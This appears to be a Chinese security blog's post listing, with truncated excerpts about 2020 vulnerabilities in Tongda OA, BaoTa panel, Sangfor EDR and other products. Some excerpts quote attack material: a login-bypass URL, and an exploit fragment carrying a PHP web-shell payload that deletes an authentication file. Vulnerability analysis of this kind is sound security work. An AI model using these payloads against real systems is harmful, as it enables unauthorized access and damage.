- 博客(4)
- 收藏
- 关注
原创 2020HW期间0day快报集合[ 每日更新 ]
目录0x01 天融信TopApp-LB 负载均衡系统sql注入0x02 用友GRP-u8 注入0x03 绿盟UTS综合威胁探针管理员任意登录0x04 齐治堡垒机前台远程命令执行漏洞(无需登录)0x05 泛微OA云桥任意文件读取漏洞0x06 Exchange Server 远程代码执行漏洞(POC未验证)0x07 联软科技产品【准入】存在任意文件上传和命令执行漏洞0x08 通达0A v11.7 后台SQL注入导致RCE0x09 天融信数据防泄漏系统越权修改管理员密码目前
2020-09-15 14:54:22 1783
原创 宝塔7.4.2未授权访问漏洞,吃瓜看黑阔删库挂黑页
注:因个别原因无法自行复现,转载自各公众号,略微进行修改添加0x01 漏洞复现下载linux7.4.2版本宝塔,使用root用户执行(当前使用centos系统),添加权限安装7.4.2linux版本下载链接:https://pan.baidu.com/s/1nUMGvof_9I4JdVtk2Z0sMA 提取码:stujchmod +x install.sh ./install.sh安装完成后,会回显用户密码以及登陆地址踩坑点:登录后,分别安装apache2.4、mysql、p
2020-08-24 14:27:22 1398
原创 某信服EDR任意用户登陆漏洞分析
影响范围: EDR <= v3.2.19漏洞描述: 终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。0x01 漏洞复现/ui/login.php?user=usernameusername 可能会有变动需要f...
2020-08-20 09:48:06 2205
原创 通达OA v11.6 RCE漏洞分析
hvv爆出rce按照网上exp进行复现成功获取shell,复现方式自行搜索(很多)比较好奇 为什么要删除文件这里从exp着手分析import requests target="http://192.168.159.137:8080/"payload="<?php eval($_POST['agan']);?>"print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
2020-08-19 17:32:30 1530 1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人